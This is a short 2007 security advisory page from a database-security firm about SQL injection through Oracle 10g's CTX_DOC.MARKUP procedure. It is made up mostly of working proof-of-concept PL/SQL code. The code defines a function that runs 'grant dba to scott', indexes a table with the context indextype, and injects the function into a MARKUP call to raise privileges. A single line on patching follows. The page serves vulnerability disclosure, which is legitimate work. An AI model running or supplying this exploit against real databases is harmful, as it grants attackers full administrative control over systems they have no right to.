Services
Information
Company |
SQL Injection via Oracle CTX_DOC.Markup in Oracle 10g in Oracle 10g
Details The following proof of concept exploit code injects a function into ctx_doc and grants the DBA permission to the user SCOTT. This exploit is working on Oracle 10g. Example CREATE OR REPLACE FUNCTION HACKIT return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'grant dba to scott'; COMMIT; RETURN ''; END; / set serveroutput on create table mark_tab (id number primary key, text varchar2(80) ); insert into mark_tab values ('1', 'All your bases are belong to US'); create index mark_tab_idx on mark_tab(text) indextype is ctxsys.context parameters ('filter ctxsys.null_filter'); SET SERVEROUTPUT ON; DECLARE mklob CLOB; amt NUMBER := 40; line VARCHAR2(80); BEGIN CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob); DBMS_LOB.READ(mklob, amt, 1, line); DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line); DBMS_LOB.FREETEMPORARY(mklob); END; / Patch Information Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update October 2007. © 2007 by Red-Database-Security GmbH - last update 28-nov-2007 |
Definition Exploit |